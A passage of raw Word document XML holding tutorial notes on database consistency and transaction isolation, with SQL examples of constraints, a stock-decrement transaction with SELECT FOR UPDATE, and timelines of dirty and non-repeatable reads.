    <w:p w14:paraId="6AEE6D6E" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   "A product cannot be ordered in quantity exceeding available stock"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E8F88A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F93AF69" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">   These require reading current state and applying business logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBD0A7C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   Database constraint system cannot express these universally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124831DC" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="76AD6D4E" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>2. Cross-database consistency:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764745DD" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   "Order in orders DB must have corresponding payment in payments DB"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27502B4B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   No cross-database foreign key — application must maintain this</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4999A766" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="26B7D504" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>3. Temporal constraints:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7573AF93" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   "An event's start_time must be before its end_time AND</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72239249" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   must not overlap with other events for the same resource"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AFEC56" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0A75C9" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   Exclusion constraint (PostgreSQL-specific):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255571FE" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   CREATE TABLE reservations (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A02EC2C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">     room_id INT,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2B3817" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">     during TSTZRANGE,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E13979B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">     EXCLUDE USING GIST (room_id WITH =, during WITH &amp;&amp;)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10ABF991" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3091E480" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   → Prevents overlapping reservations for same room using GiST index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F7DE83" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   (This IS database-enforced — an advanced feature)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B202387" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Consistency vs. Application Invariants — The real responsibility split:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFFC704" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1182972F" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Example: E-commerce order with inventory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EE986D" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="315A69D6" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Database-enforced:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749B0138" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  products.quantity &gt;= 0 (CHECK constraint)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798AB04F" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  orders.user_id REFERENCES users(id) (FK)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589AC75A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  order_items.product_id REFERENCES products(id) (FK)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DE9CE4" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B359E76" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Application-enforced (must be within same transaction):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430CE138" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  BEGIN;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6028FEB4" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC025AC" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  -- Check stock (read current state)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2971E8A4" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  SELECT quantity FROM products WHERE id = 456 FOR UPDATE;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F6950D" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  -- Returns: quantity = 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC0D36A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7B4C1E" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  -- Verify sufficient stock (application logic)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68240718" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  IF quantity &lt; order_quantity THEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493108A6" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    RAISE 'Insufficient stock'; -- application checks this invariant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7925957A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  END IF;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E46CF8" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2335457B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  -- Decrement stock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB73BED" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  UPDATE products SET quantity = quantity - 2 WHERE id = 456;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0982CE70" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  -- quantity = 1 now</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A366245" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1364EB21" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  -- Create order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219D006C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  INSERT INTO orders (...) VALUES (...);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F25E1E3" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  INSERT INTO order_items (...) VALUES (...);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B579337" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B75EFA" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  COMMIT;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC366ED" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  -- State transition: stock reduced by 2, order created</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45505E3A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  -- Both states (before and after) satisfy all constraints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373B9F87" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="0563CA53" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:lastRenderedPageBreak/>
        <w:t>What happens without the transaction:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6055822E" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Thread A: SELECT quantity → 3 (enough for 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B70091C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Thread B: SELECT quantity → 3 (enough for 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241A4E51" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Thread A: UPDATE quantity = 3 - 2 = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203B366B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Thread B: UPDATE quantity = 3 - 2 = 1 (WRONG: should be -1, violates &gt;= 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA37B2B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB8E15D" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  The CHECK constraint prevents quantity &lt; 0, so Thread B's UPDATE would fail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAA5DDD" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  But the application logic didn't catch the race condition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DFC026" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  → Need SELECT FOR UPDATE + transaction + application logic together</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDB5BFA" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:pict w14:anchorId="4FDA230A">
          <v:rect id="_x0000_i6772" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D646E6B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Isolation — The Concurrency Control Problem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70ECEE96" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Isolation Anomalies — What Can Go Wrong Without Isolation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C89EA07" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Isolation is the most complex ACID property because it governs concurrent access — and the spectrum from "no isolation" to "full isolation" involves a series of increasingly expensive mechanisms that prevent increasingly subtle anomalies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E3D9FE" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The anomaly hierarchy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2EE21A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA4F0D1" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Dirty Read:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B72EA8" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Transaction A reads data written by uncommitted Transaction B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3285CDBB" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Transaction B then rolls back</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52324B96" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Transaction A acted on data that never existed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8A8C5C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5437A194" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Timeline:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753E83DA" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    TXN A: BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A554145" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    TXN B: BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B5F6AB" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    TXN B: UPDATE accounts SET balance = 1000000 WHERE id = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C4C8AC" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">           (not yet committed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2653646C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    TXN A: SELECT balance FROM accounts WHERE id = 1 → 1000000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68405953" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">           (dirty read: sees B's uncommitted change)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07AFBA0B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    TXN B: ROLLBACK (balance reverts to original)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B80F941" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    TXN A: uses 1000000 for calculation → wrong result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE73AD6" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC8DFE9" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Example harm: fraudulent high balance read → credit extended erroneously</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1742C204" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="7719DB28" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Non-Repeatable Read:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F98737" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Within one transaction, reading the same row twice yields different values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C52238" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Another committed transaction modified the row between the two reads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BEA4FE" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCC9EA1" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Timeline:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DEE7815" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    TXN A: BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10817F32" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    TXN A: SELECT balance FROM accounts WHERE id = 1 → 1000</w:t>
      </w:r>
    </w:p>
